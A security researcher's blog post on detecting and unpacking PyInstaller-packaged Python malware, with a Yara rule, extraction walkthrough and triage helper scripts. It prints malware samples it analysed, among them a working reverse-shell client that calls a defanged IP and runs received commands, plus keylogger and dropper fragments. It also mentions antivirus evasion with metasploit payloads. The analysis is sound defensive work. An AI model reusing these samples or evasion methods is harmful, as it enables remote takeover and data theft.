Crushing Python Malware

Python is a popular choice for aspiring coders and is equally popular with more advanced developers. However, unlike programs written in compiled languages, Python scripts must be accompanied by an interpreter or they are useless. Interpreters are generally available on Linux and OS X machines by default, but Windows still does not ship with one, forcing users to download an interpreter from Python.org or ActiveState (to name two) before running the code. Even when an interpreter is present on the system, external libraries may be missing, and it's difficult to make sure applications are truly capable of running.

A handful of packages have been created that bundle Python code with an interpreter and all libraries needed to run the code, essentially turning Python scripts into standalone binaries that can be distributed to others with ease. PyInstaller and Py2Exe are two of the most widely adopted 'packagers' for Python and, when properly used, can turn Python code into standalone executables for Windows, OS X or Linux machines. PyInstaller is my tool of choice. It has served me well and the executables are generally manageable in size. Keeping in mind that it wraps all libraries, scripts and the Python interpreter into one package, the files are generally between 3 MB and 8 MB in total - significantly larger than a standard compiled C binary but still not unmanageable.

Unfortunately, these packers are also a favorite of some malware authors. After reading a paper on malware evasion techniques, I took a hard look at some of the tools at my disposal. My last C class was 15 years ago, and I'd be lucky to compile anything more than a 'Hello World' application now. I didn't want to spend a lot of time learning a new language, so I fell back on PyInstaller to help me build some AV evasion test cases. The evasion worked better than I expected - without any obfuscation I was able to bypass a majority of the AV checks and launch standard metasploit payloads in memory.

In all of my local tests, I never had an AV engine trip on any of my malicious binaries. The binaries created backdoors, deployed metasploit payloads, created files that appeared to be malicious and acted as droppers for more advanced malware. Given this surprising success, I went to work on a very generic Yara signature to identify possible PyInstaller compiled binaries.

rule PyInstaller_Binary
{
    meta:
        author = "Nicholas Albright, ThreatStream"
        desc = "Generic rule to identify PyInstaller Compiled Binaries"
    strings:
        $string0 = "zout00-PYZ.pyz"
        $string1 = "python"
        $string2 = "Python DLL"
        $string3 = "Py_OptimizeFlag"
        $string4 = "pyi_carchive"
        $string5 = ".manifest"
    condition:
        all of them // and new_file
}
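
For a quick pre-filter on a machine without Yara, the same "all of them" condition can be approximated in plain Python. This is only a sketch of the rule's logic, not a replacement for it; the function names are hypothetical, and the check is a simple case-sensitive byte search like the rule's default string matching.

```python
# Same marker strings as the Yara rule above, as raw bytes.
MARKERS = [
    b"zout00-PYZ.pyz",
    b"python",
    b"Python DLL",
    b"Py_OptimizeFlag",
    b"pyi_carchive",
    b".manifest",
]


def looks_like_pyinstaller(data):
    """Return True only if every marker string occurs somewhere in data."""
    return all(marker in data for marker in MARKERS)


def file_looks_like_pyinstaller(path):
    """Read a file from disk and apply the same check (hypothetical helper)."""
    with open(path, "rb") as handle:
        return looks_like_pyinstaller(handle.read())
```

Like the rule itself, this will match legitimate PyInstaller binaries as readily as malicious ones, so it only narrows down what to inspect next.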

My goal was to monitor Virustotal for malware built with this technique. The results were again surprising: the rule matched dozens of legitimate binaries each day. From basic video games and text processing tools to a web scraper and a database interaction tool, the binaries I received showed how popular the language really is. There were so many, in fact, that I couldn't possibly sandbox and analyze each and every one. Luckily, I knew about a tool called PyInstaller-Extractor, from extremecoders. I'd seen this tool demoed at a security conference and played around with it on some of my own binaries. It works great. My only dislike is that it extracts everything, including modules and the Python executables, and sometimes you need to go through another step to actually decompile the bytecode. In short, it's a great POC, but it's messy, and when I'm performing analysis on hundreds of binaries, I want to be a bit more efficient.

I started poking around the PyInstaller install directory and noted a file, pyi-archive_viewer.py. The name sounded promising, so I tried it against a file that matched my Yara signature:

$ pyi-archive_viewer eb17003d98e2cfa3843f24dde7a81d9a
 pos, length, uncompressed, iscompressed, type, name
[(0, 1188261, 1188261, 0, 'z', 'out00-PYZ.pyz'),
  (1188261, 170, 234, 1, 'm', 'struct'),
  (1188431, 1125, 2459, 1, 'm', 'pyi_os_path'),
  (1189556, 4916, 12555, 1, 'm', 'pyi_archive'),
  (1194472, 4043, 13091, 1, 'm', 'pyi_importers'),
  (1198515, 1800, 4228, 1, 's', '_pyi_bootstrap'),
  (1200315, 4370, 13999, 1, 's', 'pyi_carchive'),
  (1204685, 1975, 5591, 1, 's', 'EcdsaBinSign'),
  (1206660, 602, 1857, 1, 'b', 'microsoft.vc90.crt.manifest'),
  (1207262, 317595, 655872, 1, 'b', 'msvcr90.dll'),
  (1524857, 155722, 568832, 1, 'b', 'msvcp90.dll'),
  (1680579, 66835, 224768, 1, 'b', 'msvcm90.dll'),
  (1747414, 1138352, 2459136, 1, 'b', 'python27.dll'),
  (2885766, 5410, 10240, 1, 'b', 'select.pyd'),
  (2891176, 257284, 686080, 1, 'b', 'unicodedata.pyd'),
  (3148460, 381446, 774656, 1, 'b', '_hashlib.pyd'),
  (3529906, 34819, 68608, 1, 'b', 'bz2.pyd'),
  (3564725, 590119, 1201152, 1, 'b', '_ssl.pyd'),
  (4154844, 21412, 46080, 1, 'b', '_socket.pyd'),
  (4176256, 6531, 20956, 1, 'x', 'include\pyconfig.h'),
  (4182787, 269, 479, 1, 'b', 'ecdsabinsign.exe.manifest')]
?


After a bit of fumbling, I found that ? provides more help, and 's' stands for script...
 

? ?
U: go Up one level
O <nm>: open embedded archive nm
X <nm>: extract nm
Q: quit
? X EcdsaBinSign
to filename? /tmp/test-malware.py
? q
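
Since the archive listing is printed as a Python list of tuples, picking out the script entries can be automated. The sketch below is not the wrapper described in this post; it assumes the listing text has already been captured without its header line, and it treats `_pyi_bootstrap` and `pyi_carchive` as PyInstaller's own bootstrap scripts, which is an assumption based on the names in the listing above. The function name is hypothetical.

```python
import ast

# Assumption: these 's' entries are PyInstaller bootstrap code, not the author's script.
BOOTSTRAP_SCRIPTS = {"_pyi_bootstrap", "pyi_carchive"}


def user_scripts(listing_text):
    """Return names of type 's' entries that are not known bootstrap scripts."""
    entries = ast.literal_eval(listing_text)
    return [
        name
        for (_pos, _length, _uncompressed, _iscompressed, typecode, name) in entries
        if typecode == "s" and name not in BOOTSTRAP_SCRIPTS
    ]


# A shortened copy of the listing shown earlier.
listing = """[(0, 1188261, 1188261, 0, 'z', 'out00-PYZ.pyz'),
 (1198515, 1800, 4228, 1, 's', '_pyi_bootstrap'),
 (1200315, 4370, 13999, 1, 's', 'pyi_carchive'),
 (1204685, 1975, 5591, 1, 's', 'EcdsaBinSign'),
 (1747414, 1138352, 2459136, 1, 'b', 'python27.dll')]"""

print(user_scripts(listing))  # prints ['EcdsaBinSign']
```

Entries whose names contain backslashes, such as the pyconfig.h path in the full listing, may need escaping before they are parsed this way.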


Then looking at the generated file:


$ head /tmp/test-malware.py
# Key Gen for NIST224
import argparse
from ecdsa import SigningKey, NIST224p
import hashlib
import ecdsa
import binascii
# Creaet own curves
from ecdsa.curves import Curve
from ecdsa import *


Success!!! I was able to extract ONLY the script I wanted. An hour or so later, I had created a wrapper around this script that handles all of the parsing for me, giving me paged output of the Python code that actually matters. The code is just a POC, but it might help triage binaries within your own environment. Below are some examples (malicious links defanged before posting):

One AV Detection (Virustotal)

$ pyi-deflate.py 4fdf450bf59c79fa3c741e142a61e9e2
# Script: client (Likely Malicious)
    #!/usr/bin/python
    import subprocess,socket
    HOST = '24[.]171[.]140[.]173'
    PORT = 4000
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(b'Zombie Alive!')
    while 1:
        data = s.recv(1024)
        if data == b'quit': break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdoutput = proc.stdout.read() + proc.stderr.read()
        s.send(stdoutput)
    # loop ends here
    s.send(b'Zombie Dead')
    s.close()

One AV Detection (Virustotal)

$ pyi-deflate.py 42c52ba89d229d0edff0a39d687f6742
# Script: keyLogger (Likely Malicious)

    import pythoncom, pyHook
    import os
    import sqlite3
    import win32crypt
    import sys
    import threading
    import urllib,urllib2
    import smtplib
    import ftplib
    import datetime,time
    import win32event, win32api, winerror
    import getpass
    import requests

    userName = getpass.getuser()
    url = 'http://www[.]olacabsucks[.]in/upload.php'
    dirPath = os.path.dirname(os.path.abspath(__file__))

    #Disallowing Multiple Instance
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        print "Multiple Instance not Allowed"
        exit(0)
    x=''
    data=''
    counter=1

(cut)


One AV Detection (Virustotal)

$ pyi-deflate.py 5c0d6ddba42309522922e00f8019c9fd
# Script: packer (Malicious)
    from _winreg import *
    import os
    import getpass
    import ctypes

    FILE_ATTRIBUTE_HIDDEN = 0x02

    userName = getpass.getuser()
    dirPath = "C:\ProgramData\xwin"
    exeName = "wfrcen.exe"

    installerPath = os.path.dirname(os.path.abspath(__file__))

    ''' check if installation exists '''
    if (os.path.isdir(dirPath) and os.path.exists(dirPath+ "/" + exeName)) :
          print ""
    else:
          os.makedirs(dirPath)
          ''' copy the exe '''
          readFile = open(installerPath + '\deps\lib\winset.exe','rb')
          printFileText = readFile.read()
          outFile = open( dirPath + '/' + exeName , 'wb')
          outFile.write(printFileText)
          readFile.close()
          outFile.close()

          '''hide the folder and file'''

          ctypes.windll.kernel32.SetFileAttributesW(ur'C:\ProgramData\xwin', FILE_ATTRIBUTE_HIDDEN)
          ctypes.windll.kernel32.SetFileAttributesW(ur'C:\ProgramData\xwin\wfrcen.exe', FILE_ATTRIBUTE_HIDDEN)
(cut)

Four AV Detections (Virustotal)

$ pyi-deflate.py c3c742450f4388bdcbacfc7d6598d02a
# Script: windows_amit_bhai (Malicious)
    #############
    #Disc : I am not responsible for negative use of the program.
    #Use It Wisely
    #############

(...cut...)

    import socket
    while 1:
        try:

            HOST = '168[.]144[.]144[.]44'
            PORT = 8082 # Arbitrary non-privileged port
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST,PORT))
            break
        except:
            time.sleep(10)

    s.send('Client Connected From: ' + ip + ' Country: ' + country + ' Mac:' + str(mac))

    data = s.recv(1024)

By successfully extracting only the relevant parts of the code, I could focus my efforts on the next phase of this project: extracting observables and trying to understand the adversaries using these techniques. Many more malicious scripts were identified. Across all samples, the highest number of vendors flagging any single file as malicious on Virustotal was six. None of those vendors were what I'd call enterprise-grade AV solutions, and they all missed files obfuscated with pyobfuscate.
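
As a rough illustration of what extracting observables from a recovered script could look like, the sketch below pulls IPv4 addresses and URLs out of source text and defangs them in the style used in the examples above. The regular expressions and function names are assumptions made for this example and are not taken from pyi-deflate.py; real samples will need broader patterns.

```python
import re
from urllib.parse import urlsplit

# Dotted-quad IPv4 addresses with each octet limited to 0-255.
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(r"\b(?:" + OCTET + r"\.){3}" + OCTET + r"\b")
# http/https URLs up to the next whitespace or quote character.
URL_RE = re.compile(r"https?://[^\s'\"]+")


def defang_ip(address):
    """Replace every dot so the address cannot be clicked or resolved by accident."""
    return address.replace(".", "[.]")


def defang_url(url):
    """Defang only the host portion of a URL, leaving the path untouched."""
    host = urlsplit(url).netloc
    return url.replace(host, host.replace(".", "[.]"), 1)


def extract_observables(source):
    """Return sorted, de-duplicated, defanged IPs and URLs found in source."""
    ips = sorted({defang_ip(ip) for ip in IPV4_RE.findall(source)})
    urls = sorted({defang_url(url) for url in URL_RE.findall(source)})
    return {"ips": ips, "urls": urls}
```

Run against each extracted script, the output gives a small indicator list per sample that can be compared across binaries.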

It became immediately obvious that code reuse is as popular with Python as with any other language. Most of the code blocks were found on forums or Stack Overflow. Everything protected with pyobfuscate used ctypes to inject known metasploit payloads. I can only state the obvious: the authors were all, quite literally, script kiddies. Their methods were successful, however.

After pulling down a couple hundred different binaries, I found that about 40% failed to extract with my original wrapper script. Closer analysis around the PYZ header showed that the usual zlib header of \x78\x9c had been modified, as had other magic numbers. Roughly 9 out of 10 of those failures could be extracted easily by reconstructing the correct zlib header and manually carving out the Python scripts.
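
The header repair can be sketched as follows. This is a minimal illustration, assuming that only the two-byte zlib header was altered and that the offset and length of the compressed script within the supplied data are already known; the function names are hypothetical and this is not the code from pyi-deflate.py.

```python
import zlib

ZLIB_HEADER = b"\x78\x9c"  # the usual zlib header mentioned above


def inflate_with_repaired_header(blob):
    """Swap the first two bytes for the standard zlib header, then decompress."""
    return zlib.decompress(ZLIB_HEADER + blob[2:])


def carve_script(data, offset, length):
    """Cut length bytes starting at offset out of data and inflate them.

    Assumption: offset is relative to the start of the bytes passed in.
    """
    return inflate_with_repaired_header(data[offset:offset + length])


# Demonstration on a synthetic stream with a deliberately corrupted header.
source = b"print('hello from the archive')\n"
tampered = b"\xde\xad" + zlib.compress(source)[2:]
print(inflate_with_repaired_header(tampered) == source)  # prints True
```

Samples where more than the header was changed will still fail here and need manual analysis.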

We are sharing the script at https://github.com/threatstream/labs-tools/blob/master/pyi-deflate.py.

Note: For py2exe packaged binaries, unpy2exe and uncompyle2 combined are equally successful.
